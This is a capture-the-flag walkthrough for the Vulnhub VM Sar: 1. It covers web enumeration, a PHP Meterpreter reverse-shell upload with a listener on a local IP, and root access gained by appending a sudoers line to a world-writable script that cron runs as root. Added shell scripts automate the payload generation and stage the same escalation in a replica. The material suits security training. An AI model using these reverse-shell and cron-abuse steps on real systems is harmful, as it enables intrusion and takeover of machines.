Sar: 1 walkthrough Vulnhub CTF

Today we are solving another Vulnhub CTF, Sar: 1. This VM was created by Love; you can download it from its Vulnhub page.

Description of Sar 1 CTF

Sar is an OSCP-like VM with the intent of gaining experience in the world of penetration testing.

Network Scanning

We run this lab in VMware Player or VirtualBox. Once the VM is up, we use netdiscover to find its IP address on the local network.

Next we run an aggressive Nmap scan (nmap -A) against the target. The scan shows port 80 (HTTP) open.

Starting with port 80, we browse to the target and see the Apache default page. Enumerating the web site, we find a robots.txt file.

robots.txt points to the sar2HTML directory. Opening that URL, we find the sar2HTML application, and after enumerating it we find a file-upload field: click the New button, click Browse, select your shell, and hit Upload Report.

Create a simple PHP reverse shell with Metasploit in raw format.

Start the Metasploit listener:

  • use exploit/multi/handler
  • set payload php/meterpreter/reverse_tcp
  • set lhost 192.168.1.19
  • set lport 4545
  • run

The uploaded shell appears in the upload directory; clicking it triggers the payload.

A Meterpreter session opens on the target. Running the shell command drops into a bare, non-interactive shell, so we upgrade it to a TTY with Python's pty module.
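The payload-and-listener steps above, scripted so the settings are reproducible. This is an added example and not the walkthrough's own commands: LHOST 192.168.1.19, LPORT 4545 and the payload name are the values the walkthrough uses, while the output file name shell.php and the handler resource-script path are assumptions.

```shell
#!/bin/sh
# Added example (not from the walkthrough): build the raw PHP payload with
# msfvenom and start exploit/multi/handler from a resource script instead of
# typing the five commands by hand each time.
# LHOST/LPORT/payload are the walkthrough's values; file names are assumed.

LHOST=192.168.1.19
LPORT=4545
PAYLOAD=php/meterpreter/reverse_tcp

# Generate the PHP reverse shell to upload through sar2HTML. "-f raw" emits
# PHP source rather than an encoded blob, which is what a PHP upload needs.
gen_php_payload() {
    msfvenom -p "$PAYLOAD" LHOST="$LHOST" LPORT="$LPORT" -f raw -o "$1"
}

# Write an msfconsole resource script with the same commands the walkthrough
# lists; prints the path it wrote so callers can pass it to msfconsole -r.
write_handler_rc() {
    cat > "$1" <<EOF
use exploit/multi/handler
set payload $PAYLOAD
set lhost $LHOST
set lport $LPORT
run
EOF
    echo "$1"
}

# Resource-script path is an assumption; mktemp avoids clobbering a real file.
RC="$(write_handler_rc "$(mktemp "${TMPDIR:-/tmp}/sar_handler.XXXXXX")")"

# Only invoke the Metasploit tools when they are installed; the resource
# script above is written regardless so the listener settings are on disk.
if command -v msfvenom >/dev/null 2>&1; then
    gen_php_payload shell.php
    echo "Upload shell.php via sar2HTML, then start the listener with: msfconsole -q -r $RC"
else
    echo "msfvenom not found; handler resource script written to $RC"
fi
```

Start the listener with `msfconsole -q -r` on the written file before clicking the uploaded shell; the payload connects back to LHOST:LPORT, so those must match the address the target can reach, not a NAT-only interface.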

Enumerating the file system, we find the first flag, user.txt.

The first flag is in the home directory of the user love.

The crontab shows a script that cron runs as root every 5 minutes.

Moving to /var/www/html, we find that script, finally.sh.

Reading finally.sh with cat shows that it calls another script, write.sh. Checking the permissions of write.sh, we see it is world-writable: any user can edit it.

Since write.sh is executed as root by cron every 5 minutes, we edit it and append an echo command that adds our current user to the sudoers file.

After 5 minutes, sudo -l shows the new sudoers entry for our user.
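The escalation path above, reproduced as an added example that is not the walkthrough's own commands. It rebuilds the root cron job, finally.sh and write.sh as a constructed replica in a scratch directory, walks the chain from the crontab to report any file in it that other users can write, and then stages the sudoers line the walkthrough appends. The crontab line, the script contents and the `ALL=(ALL) NOPASSWD:ALL` form of the sudoers entry are assumptions; the user name is taken from `id -un`.

```shell
#!/bin/sh
# Added example (not from the walkthrough). Constructed replica of the
# Sar: 1 cron chain in a scratch directory, plus a checker that follows a
# crontab through the scripts it calls and prints each file "other" can write.
# Cron line, script names and contents are assumed, not copied from the VM.

LAB="$(mktemp -d)"
mkdir -p "$LAB/var/www/html" "$LAB/etc"

# Replica of the root crontab entry: runs every 5 minutes as root.
printf '*/5 * * * * root %s/var/www/html/finally.sh\n' "$LAB" > "$LAB/etc/crontab"

# finally.sh is writable only by its owner and simply calls write.sh.
printf '#!/bin/sh\n./write.sh\n' > "$LAB/var/www/html/finally.sh"
chmod 755 "$LAB/var/www/html/finally.sh"

# write.sh is the weak link: mode 777, so any local user can edit what root runs.
printf '#!/bin/sh\ntouch /tmp/gateway\n' > "$LAB/var/www/html/write.sh"
chmod 777 "$LAB/var/www/html/write.sh"

# Print $1 if its "other write" bit is set (column 9 of ls -ld), then follow
# every ./name or /abs/name token in it that resolves to an existing file.
walk_script() {
    local script="$1" dir tok child
    dir="$(dirname "$script")"
    [ -f "$script" ] || return 0
    if [ "$(ls -ld "$script" | cut -c9)" = "w" ]; then
        echo "$script"
    fi
    for tok in $(grep -v '^#' "$script"); do
        case "$tok" in
            ./*) child="$dir/${tok#./}" ;;
            /*)  child="$tok" ;;
            *)   continue ;;
        esac
        if [ -f "$child" ] && [ "$child" != "$script" ]; then
            walk_script "$child"
        fi
    done
    return 0
}

# For each crontab line take the command part (field 7 onward in a system
# crontab, which has a user column) and walk every absolute path in it.
cron_chain_writable() {
    local crontab="$1" start
    for start in $(awk '!/^#/ && NF >= 7 { for (i = 7; i <= NF; i++) if ($i ~ /^\//) print $i }' "$crontab"); do
        walk_script "$start"
    done
    return 0
}

# Append the line the walkthrough adds: an echo that grants $2 passwordless
# sudo when root next runs the script. Here it lands in the replica only.
stage_sudoers_payload() {
    local target="$1" user="$2"
    printf 'echo "%s ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers\n' "$user" >> "$target"
}

WRITABLE="$(cron_chain_writable "$LAB/etc/crontab")"
echo "world-writable file in root cron chain: $WRITABLE"
stage_sudoers_payload "$WRITABLE" "$(id -un)"
```

On a real target, point `cron_chain_writable` at /etc/crontab and each file under /etc/cron.d, and check the user crontabs separately. The walker only follows `./name` and absolute tokens, so a job written as `cd /dir && ./script` needs the directory resolved by hand; it also reports only the "other" write bit, so a script writable through a group you belong to, or a directory you can rename into, still has to be checked with `ls -ld` on each path. The fix on the defensive side is the mirror image: every file cron runs as root, and every directory on the way to it, should be root-owned and not writable by anyone else.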

Privilege Escalation

With root privileges, we read the last flag, root.txt.
